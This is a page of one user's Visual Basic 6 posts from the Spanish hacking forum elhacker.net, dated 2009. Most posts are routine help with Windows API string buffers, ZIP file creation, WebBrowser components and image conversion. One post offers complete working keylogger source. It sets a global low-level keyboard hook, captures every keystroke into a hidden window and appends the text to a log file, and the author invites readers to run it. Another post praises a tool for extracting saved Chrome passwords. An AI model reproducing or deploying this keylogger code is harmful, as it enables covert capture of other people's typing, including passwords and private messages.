elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Mensajes
Páginas: 1 ... 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 [34] 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 ... 74
331  Programación / Programación Visual Basic / Re: ayuda con APIs en: 19 Agosto 2009, 20:41 pm
Hola cuando trabajas con apis y estas modifican un parametro de tipo String o Bits tenes que redimencionar para crear un buffer donde estas apis volcaran la informaición.

en el ejemplo que pusite hay una cosa mal te explico

volumen = String$(255, Chr$(0))

esto crea un buffer con un tamaño de  255 con todos Bits nulos

y despues al final utiliza la funcion

Label1.Caption = Trim(volumen)

Trim es solo para los espacios por lo que en este caso tu usaste Bits nulos  entonces no lo eliminara el exedente.

ahora si ubieras puesto


volumen = String$(255, Space(1))

y luego

Label1.Caption = Trim(volumen)

entoses si porque estaria quitando los ultimos espacios, pero esto puede traer una complejidad ya que suponte que  volumen termina con espacios estos se estarian perdiendo entonces es mejor utilizar bits nulos

y para quitar los bits nulos se utiliza  esta forma

volumen= Left$(volumen, InStr(1, volumen, Chr$(0)) - 1)

osea la izquierda hasta donde se encuentre el primer bits nulo


seguramente con la explicación que te di no querras ver mas una api  ;D

Saludos



332  Programación / Programación Visual Basic / Keylogger (Otro metodo) en: 18 Agosto 2009, 06:58 am
Hola ya que viene la racha con los Keylogger, pongo otro método, ayer mirando el tuto de Karcrack supuse que tendría que haber otra forma de transladar las teclas, así que se me dió por pasarles los msg del hook a una ventana de tipo EDIT (WM_IME_KEYDOWN), y el resultado fue bastante bueno, inclusive toma las @ y símbolos especiales, excepto los acentos porque si se los dejaba no los agrega a la ventana donde escribía.

Seria bueno que si alguien tiene un teclado inglés lo pruebe a ver si funciona todo bien.

Código
  1. Option Explicit
  2. '------------------------------------
  3. 'Autor:   Leandro Ascierto
  4. 'Web:     www.leandroascierto.com.ar
  5. 'Fecha:   18-08-09
  6. 'En base a tutorial de Karcrack
  7. '------------------------------------
  8. Private Declare Function SetWindowsHookEx Lib "user32.dll" Alias "SetWindowsHookExA" (ByVal idHook As Long, ByVal lpfn As Long, ByVal hmod As Long, ByVal dwThreadId As Long) As Long
  9. Private Declare Function UnhookWindowsHookEx Lib "user32.dll" (ByVal hHook As Long) As Long
  10. Private Declare Function CallNextHookEx Lib "user32.dll" (ByVal hHook As Long, ByVal nCode As Long, ByVal wParam As Long, ByRef lParam As Any) As Long
  11. Private Declare Function PostMessage Lib "user32.dll" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
  12. Private Declare Function GetForegroundWindow Lib "user32.dll" () As Long
  13. Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
  14. Private Declare Function GetWindowTextLength Lib "user32.dll" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
  15. Private Declare Function SetWindowText Lib "user32.dll" Alias "SetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String) As Long
  16. Private Declare Function CreateWindowEx Lib "user32.dll" Alias "CreateWindowExA" (ByVal dwExStyle As Long, ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hWndParent As Long, ByVal hMenu As Long, ByVal hInstance As Long, ByRef lpParam As Any) As Long
  17. Private Declare Function DestroyWindow Lib "user32.dll" (ByVal hwnd As Long) As Long
  18.  
  19. Private Const ES_MULTILINE              As Long = &H4&
  20. Private Const ES_AUTOVSCROLL            As Long = &H40&
  21. Private Const ES_AUTOHSCROLL            As Long = &H80&
  22.  
  23. Private Const WM_IME_KEYDOWN            As Long = &H290
  24. Private Const WM_SYSKEYDOWN             As Long = &H104
  25. Private Const WM_KEYDOWN                As Long = &H100
  26. Private Const WM_KEYUP                  As Long = &H101
  27. Private Const WH_KEYBOARD_LL            As Long = 13
  28.  
  29. Private Const BUFFER_TO_SAVE            As Long = 100
  30.  
  31. Private hEdit                           As Long
  32. Private KBHook                          As Long
  33. Private sTextData                       As String
  34. Private TextLen                         As Long
  35.  
  36.  
  37. Public Sub ManageKeylogger(ByVal Enable As Boolean)
  38.    Select Case Enable
  39.        Case True
  40.            hEdit = CreateWindowEx(0, "EDIT", "", ES_MULTILINE Or ES_AUTOVSCROLL Or ES_AUTOHSCROLL, 0, 0, 0, 0, 0, 0, App.hInstance, 0)
  41.            KBHook = SetWindowsHookEx(WH_KEYBOARD_LL, AddressOf KBProc, App.hInstance, 0)
  42.            Debug.Print hEdit
  43.        Case False
  44.            Call UnhookWindowsHookEx(KBHook)
  45.            TextLen = GetWindowTextLength(hEdit)
  46.            If TextLen Then LogToFile App.Path & "\Log.txt"
  47.            DestroyWindow hEdit
  48.    End Select
  49. End Sub
  50.  
  51.  
  52. Private Function KBProc(ByVal nCode As Long, ByVal wParam As Long, lParam As Long) As Long
  53.  
  54.    Select Case wParam
  55.  
  56.        Case WM_KEYDOWN
  57.            If lParam <> 222 And lParam <> 186 Then
  58.                Call PostMessage(hEdit, WM_IME_KEYDOWN, lParam, 0&)
  59.            End If
  60.  
  61.        Case WM_KEYUP
  62.            TextLen = GetWindowTextLength(hEdit)
  63.            If TextLen > BUFFER_TO_SAVE Then
  64.                LogToFile App.Path & "\Log.txt"
  65.            End If
  66.  
  67.        Case WM_SYSKEYDOWN
  68.            Call PostMessage(hEdit, WM_IME_KEYDOWN, lParam, 0&)
  69.  
  70.    End Select
  71.  
  72. End Function
  73.  
  74.  
  75. Private Sub LogToFile(ByVal sPath As String)
  76.  
  77.    sTextData = String(TextLen + 1, Chr$(0))
  78.    GetWindowText hEdit, sTextData, TextLen + 1
  79.    SetWindowText hEdit, vbNullString
  80.  
  81.    Open sPath For Append As #1
  82.        Print #1, sTextData
  83.    Close #1
  84.  
  85. End Sub
  86.  
  87.  

 Saludos.


333  Programación / Programación Visual Basic / Re: Conexión entre cliente y servidor sin transmisión de IP en: 12 Agosto 2009, 02:19 am
me parece que si se esta vajo una LAN se utiliza la funcion Bind, el cliente conecta al servidor que este en escucha dentro del mismo puerto, dentro de la red, puede ser?

Saludos
334  Programación / Programación Visual Basic / Re: Error Componente WebBrowser (ayuda) en: 6 Agosto 2009, 20:46 pm
hola provaste con este "C:\windows\system32\shdocvw.dll" yo tengo IE7 y ese es el que me carga cuando abro el proyecto.

Saludos
335  Programación / Programación Visual Basic / Re: Comprimir en ZIP con Visual Basic? en: 4 Agosto 2009, 04:44 am
jeje recien me acabo de dar cuenta que solo lo pone dentro de una carpeta.zip pero no reduce su tamaño.  >:(
336  Programación / Programación Visual Basic / Re: Comprimir en ZIP con Visual Basic? en: 4 Agosto 2009, 04:24 am
Hola estuve mirando el codigo de XcryptOR por lo que vi tiene unos problemas con los ByVal por ese motivo hay que compilarlo en p-code

les quite el byval en algunos WriteFile y CopyMemory y ahora no hace falta compilarlo en p-code


Código
  1. Option Explicit
  2. Private Declare Function CreateFile Lib "Kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, lpSecurityAttributes As Long, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
  3. Private Declare Function ReadFile Lib "Kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Long) As Long
  4. Private Declare Function WriteFile Lib "Kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, lpOverlapped As Long) As Long
  5. Private Declare Function CloseHandle Lib "Kernel32" (ByVal hObject As Long) As Long
  6. Private Declare Function GlobalAlloc Lib "Kernel32" (ByVal wFlags As Long, ByVal dwBytes As Long) As Long
  7. Private Declare Function GlobalFree Lib "Kernel32" (ByVal hMem As Long) As Long
  8. Private Declare Function GetFileSize Lib "Kernel32" (ByVal hFile As Long, lpFileSizeHigh As Long) As Long
  9. Private Declare Sub ZeroMemory Lib "Kernel32" Alias "RtlZeroMemory" (dest As Any, ByVal numbytes As Long)
  10. Private Declare Function SetFilePointer Lib "Kernel32" (ByVal hFile As Long, ByVal lDistanceToMove As Long, lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long
  11. Private Declare Sub GetSystemTime Lib "Kernel32" (lpSystemTime As SYSTEMTIME)
  12. Private Declare Sub CopyMemory Lib "Kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
  13.  
  14. Private Const FILE_BEGIN = 0
  15. Private Const GENERIC_READ = &H80000000
  16. Private Const GENERIC_WRITE = &H40000000
  17. Private Const FILE_SHARE_READ = &H1
  18. Private Const CREATE_ALWAYS = 2
  19. Private Const OPEN_EXISTING = 3
  20. Private Const INVALID_HANDLE_VALUE = -1
  21. Private Const GMEM_FIXED = &H0
  22. Private Const GMEM_ZEROINIT = &H40
  23. Private Const GPTR = (GMEM_FIXED Or GMEM_ZEROINIT)
  24.  
  25. Private Type LOCAL_FILE_HEADER
  26. Signature As Long          'Firma &H04034b50
  27. ver_needed As Integer      'Version minima de software necesaria para extraer el archivo
  28. Flags As Integer           'Opciones
  29. method As Integer          'Metodo de compresion
  30. lastmod_time As Integer    'Tiempo de ultima modificacion
  31. lastmod_date As Integer    'Fecha de ultima modificacion
  32. crcLO As Integer                'CRC del file
  33. crcHI As Integer
  34. compressed_sizeLO As Integer    'Tamaño de file comprimido
  35. compressed_sizeHI As Integer
  36. uncompressed_sizeLO As Integer  'Tamaño del file sin comprimir
  37. uncompressed_sizeHI As Integer
  38. filename_length As Integer 'Longitud del nombre del Archivo
  39. extra_length As Integer    'Longitud de "InFormacion Adicional" ¿?
  40. End Type
  41.  
  42. Private Type CENTRAL_DIRECTORY_STRUCTURE
  43. Signature As Long          'FIRMA &H02014b50
  44. made_by As Integer         'Indica SO y version de software donde se comprimio el file
  45. ver_needed As Integer      'Version minima de software necesaria para extraer el archivo
  46. Flags As Integer           'Opciones
  47. method As Integer          'Metodo de compresion
  48. lastmod_time As Integer    'Tiempo de ultima modificacion
  49. lastmod_date As Integer    'Fecha de ultima modificacion
  50. crc As Long                'CRC del file
  51. compressed_size As Long    'Tamaño de file comprimido
  52. uncompressed_size As Long  'Tamaño del file sin comprimir
  53. filename_length As Integer 'Longitud del nombre del Archivo
  54. extra_length As Integer    'Longitud de "InFormacion Adicional" ¿?
  55. comment_length As Integer  'Longitud de los comentarios
  56. disk_nums As Integer       'El número del disco por el cual este archivo comienza ¿?
  57. internal_attr As Integer   'Opciones entre ellas: Si el file tiene datos ASCII(texto) o Binarios
  58. external_attrLO As Integer 'Opciones entre ellas: Tipo de Sistema de Archivos
  59. external_attrHI As Integer '
  60. local_offs As Long         'N° de Byte donde comienza el correspondiente
  61.                            'LOCAL_FILE_HEADER de esta struct CENTRAL_DIRECTORY_STRUCTURE
  62. End Type
  63.  
  64. Private Type END_CENTRAL_DIR
  65. Signature As Long           'FIrma &H06054b50
  66. disk_nums As Integer        '"El número de este disco, que contiene el expediente de extremo central del directorio" ¿?
  67. disk_dirstart As Integer    '"El número del disco en el cual el directorio central comienza" ¿?
  68. disk_dir_entries As Integer 'El número de entradas en el central directory en este disco
  69. dir_entries As Integer      'El número total de archivos en el zipfile
  70. dir_size As Long            'El tamaño (en bytes) de la o las CENTRAL_DIRECTORY_STRUCTURE que contenga el zip
  71. dir_offs As Long            'N° de Byte donde comienza la CENTRAL_DIRECTORY_STRUCTURE o la primera CENTRAL_DIRECTORY_STRUCTURE
  72.                             'si es que hay más de una
  73. comment_length As Integer   'Longitud de los Comentarios
  74. End Type
  75.  
  76. Private Type SYSTEMTIME
  77. wYear As Integer
  78. wMonth As Integer
  79. wDayOfWeek As Integer
  80. wDay As Integer
  81. wHour As Integer
  82. wMinute As Integer
  83. wSecond As Integer
  84. wMilliseconds As Integer
  85. End Type
  86.  
  87. Private Type HL_DWORD
  88. LoWord As Integer
  89. HiWord As Integer
  90. End Type
  91.  
  92. Private CRCTable(256) As Long
  93.  
  94. Private Sub SetCRCTable()
  95. 'Code CRC32 de www.vbaccelerator.com
  96. On Error Resume Next
  97. Dim dwPolynomial As Long, dwCrc As Long, I As Integer, j As Integer
  98. dwPolynomial = &HEDB88320
  99.  
  100. For I = 0 To 255
  101.  dwCrc = I
  102.  For j = 8 To 1 Step -1
  103.   If (dwCrc And 1) Then
  104.   dwCrc = ((dwCrc And &HFFFFFFFE) \ 2&) And &H7FFFFFFF
  105.   dwCrc = dwCrc Xor dwPolynomial
  106.   Else
  107.   dwCrc = ((dwCrc And &HFFFFFFFE) \ 2&) And &H7FFFFFFF
  108.   End If
  109.  Next
  110.  CRCTable(I) = dwCrc
  111. Next
  112. End Sub
  113.  
  114. Private Function GetCRC32(Buffer As String) As Long
  115. 'Code CRC32 de www.vbaccelerator.com
  116. On Error Resume Next
  117. Dim crc As Long, I As Long, iLookup As Integer
  118.  
  119. crc = &HFFFFFFFF
  120.  
  121. For I = 1 To Len(Buffer)
  122. iLookup = (crc And &HFF) Xor Asc(Mid(Buffer, I, 1))
  123. crc = ((crc And &HFFFFFF00) \ &H100) And 16777215
  124. crc = crc Xor CRCTable(iLookup)
  125. Next
  126.  
  127. GetCRC32 = Not (crc)
  128. End Function
  129.  
  130. Public Function Zipea(ffile As String, fzip As String, fname As String) As Boolean
  131. On Error Resume Next
  132. Dim lfh As LOCAL_FILE_HEADER
  133. Dim cds As CENTRAL_DIRECTORY_STRUCTURE
  134. Dim ecd As END_CENTRAL_DIR
  135. Dim st As SYSTEMTIME
  136. Dim File As String, FPtr As Long
  137. Dim sz As Long, Dw As Long, o As Long
  138. Dim hFile As Long, hZip As Long
  139. Dim HL As HL_DWORD
  140. Dim CRC32 As Long
  141.  
  142. o = 0
  143.  
  144. hFile = CreateFile(ffile, GENERIC_READ, FILE_SHARE_READ, ByVal 0&, OPEN_EXISTING, 0, 0)
  145. If (hFile = INVALID_HANDLE_VALUE) Then Zipea = False: Exit Function
  146.  
  147. hZip = CreateFile(fzip, GENERIC_WRITE, FILE_SHARE_READ, ByVal 0&, CREATE_ALWAYS, 0, 0)
  148. If (hZip = INVALID_HANDLE_VALUE) Then CloseHandle (hFile): Zipea = False: Exit Function
  149.  
  150. ZeroMemory ByVal lfh, Len(lfh)
  151. ZeroMemory ByVal cds, Len(cds)
  152. ZeroMemory ByVal ecd, Len(ecd)
  153.  
  154. Call GetSystemTime(st)
  155. If (st.wHour > 12) Then st.wHour = st.wHour - 12
  156.  
  157. sz = GetFileSize(hFile, 0)
  158.  
  159. lfh.Signature = &H4034B50
  160. lfh.ver_needed = 10
  161. lfh.Flags = 0
  162. lfh.method = 0
  163. lfh.lastmod_time = (st.wHour) * (2 ^ 11) Or (st.wMinute * (2 ^ 5)) Or (st.wSecond / 2)
  164. lfh.lastmod_date = ((st.wYear - 1980) * (2 ^ 9)) Or (st.wMonth * (2 ^ 5)) Or (st.wDay)
  165.  
  166. CopyMemory HL, sz, 4
  167.  
  168. lfh.uncompressed_sizeHI = HL.HiWord And &HFFFF
  169. lfh.uncompressed_sizeLO = HL.LoWord And &HFFFF
  170. lfh.compressed_sizeHI = HL.HiWord And &HFFFF
  171. lfh.compressed_sizeLO = HL.LoWord And &HFFFF
  172. lfh.filename_length = Len(fname)
  173. lfh.extra_length = 0
  174.  
  175. cds.Signature = &H2014B50
  176. cds.made_by = 20           'MSDOS=0, PKZIP 2.0 =20
  177. cds.ver_needed = 10
  178. cds.Flags = 0
  179. cds.method = 0
  180. cds.lastmod_time = (st.wHour) * (2 ^ 11) Or (st.wMinute * (2 ^ 5)) Or (st.wSecond / 2)
  181. cds.lastmod_date = ((st.wYear - 1980) * (2 ^ 9)) Or (st.wMonth * (2 ^ 5)) Or (st.wDay)
  182. cds.compressed_size = sz
  183. cds.uncompressed_size = sz
  184. cds.filename_length = Len(fname)
  185. cds.extra_length = 0
  186. cds.comment_length = 0
  187. cds.disk_nums = 0
  188. cds.local_offs = 0
  189. cds.internal_attr = 0      'Datos Binarios
  190. cds.external_attrLO = &H20 'FAT_32 (&H20=32)
  191. cds.external_attrHI = &H0
  192.  
  193.  
  194. Call SetFilePointer(hFile, 0, 0, FILE_BEGIN)
  195. FPtr = GlobalAlloc(GPTR, sz)
  196. If (FPtr = 0) Then Zipea = False: GoTo Cierra
  197.  
  198.  Call ReadFile(hFile, ByVal FPtr, sz, Dw, ByVal 0)
  199.  If (Dw = 0) Then Zipea = False: GoTo Cierra
  200.  
  201.  File = Space$(Dw)
  202.  CopyMemory ByVal File, ByVal FPtr, Dw
  203.  
  204. Call SetCRCTable
  205.  
  206. CRC32 = GetCRC32(File)
  207.  
  208. CopyMemory HL, CRC32, 4
  209.  
  210. lfh.crcLO = HL.LoWord And &HFFFF
  211. lfh.crcHI = HL.HiWord And &HFFFF
  212.  
  213. cds.crc = CRC32
  214.  
  215. Call WriteFile(hZip, lfh, Len(lfh), Dw, ByVal 0&)
  216. Call WriteFile(hZip, ByVal fname, Len(fname), Dw, ByVal 0&)
  217. Call WriteFile(hZip, ByVal File, sz, Dw, ByVal 0&)
  218.  
  219. GlobalFree (FPtr)
  220. o = o + (Len(lfh) + Len(fname) + sz)
  221.  
  222. ecd.dir_offs = o
  223.  
  224. Call WriteFile(hZip, cds, Len(cds), Dw, ByVal 0&)
  225. Call WriteFile(hZip, ByVal fname, Len(fname), Dw, ByVal 0&)
  226. o = o + (Len(cds) + Len(fname))
  227.  
  228. ecd.Signature = &H6054B50
  229. ecd.disk_nums = 0
  230. ecd.disk_dirstart = 0
  231. ecd.disk_dir_entries = 1
  232. ecd.dir_entries = 1
  233. ecd.dir_size = o - ecd.dir_offs
  234. ecd.comment_length = 0
  235. Call WriteFile(hZip, ecd, Len(ecd), Dw, ByVal 0&)
  236.  
  237. Zipea = True
  238. Cierra:
  239. CloseHandle (hFile): CloseHandle (hZip)
  240. End Function
  241.  
  242.  
  243.  
  244. Private Sub Form_Load()
  245. If Zipea("C:\SearchDesckTop.exe", "C:\nombrefile.zip", "SearchDesckTop.exe") = True Then MsgBox "Compresion de Archivo Exitosa" Else Beep
  246. End Sub
  247.  

Saludos

337  Programación / Programación Visual Basic / Re: Comprimir en ZIP con Visual Basic? en: 4 Agosto 2009, 02:52 am
hola la verdad no conosia ese codigo le voy a echar un vistaso,

te pongo tres metodos mas pero bue...

1 - utilizando zip32dll (recomendable)


2 - utilizando el objeto Shell.Application  (windows xp y superiores(creo))

Código:
Option Explicit
Private Sub Form_Load()
    Comprimir "C:\CarpetaComprimida.zip", "C:\Archivo.exe"
End Sub


Private Function Comprimir(DestPath As Variant, SrcPath As Variant) As Boolean
    On Error GoTo Fail
   
    Dim oShell As Object
   
    Set oShell = CreateObject("Shell.Application")
   
    If Dir(DestPath) = "" Then
        Open DestPath For Binary As #1
            Put #1, , CStr("PK" & Chr(5) & Chr(6) & String(18, Chr(0)))
        Close
    End If
   
   
    oShell.NameSpace(DestPath).CopyHere SrcPath
    Comprimir = True
Fail:

End Function

3 - utilizando lineas de comando sobre los compresores WinZip y WinRar (te daras cuenta sobre las desventajas de esto)
338  Programación / Programación Visual Basic / Re: Interceptar Mensaje en: 3 Agosto 2009, 22:44 pm
mesague de q . winsock . o del programa comun

El lo que busca son otros tipos de mensaje, por lo que tengo entendido la única forma de subclasificar una ventana ajena a tu aplicación es mediante alguna dll que haga esto.
yo actualmente estoy utilizando  dscwpmsg.dll, en el link tenes la dll + un ejemplo de cómo se utiliza.

Ya que esta el tema abierto alguien más conoce otra dll de este tipo?
339  Programación / Programación Visual Basic / Re: Chrome password recovery tool [SRC] en: 27 Julio 2009, 20:08 pm
muy bueno cobein, hice un par de pruebas y anda bien, el unico caso que no me mostro la contraseña es en esta pagina me puso todos asteriscos

URL:http://foro.elhacker.net/login.html
USER:LeandroA
PASS:********


hay que tener en cuenta que no debe estar abierto el crome, y que el navegador debe pedirte recordar la contraseña.

en mi caso no dio ningun Crash

muy bueno el modulo Sqlite
340  Programación / Programación Visual Basic / Re: se podria convertir una imagen jpg en bmp desde vbasic (solucionado) en: 25 Julio 2009, 02:48 am
aver... creo que aqui hay un error de interpretacion... ;D

generalmente todos buscan pasar de bmp a jpg, pero segun dice el titulo el lo que quiere es de jpg a bmp, y quizas como es nuevo no sabe lo facil que seria...

pregunto pedraosone  vose queres pasar de JPG a BMP???, si es asi es tan facil como esto.

SavePicture LoadPicture("C:\Foto.JPG"), "C:\Foto.BMP"


Saludos
Páginas: 1 ... 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 [34] 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 ... 74
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines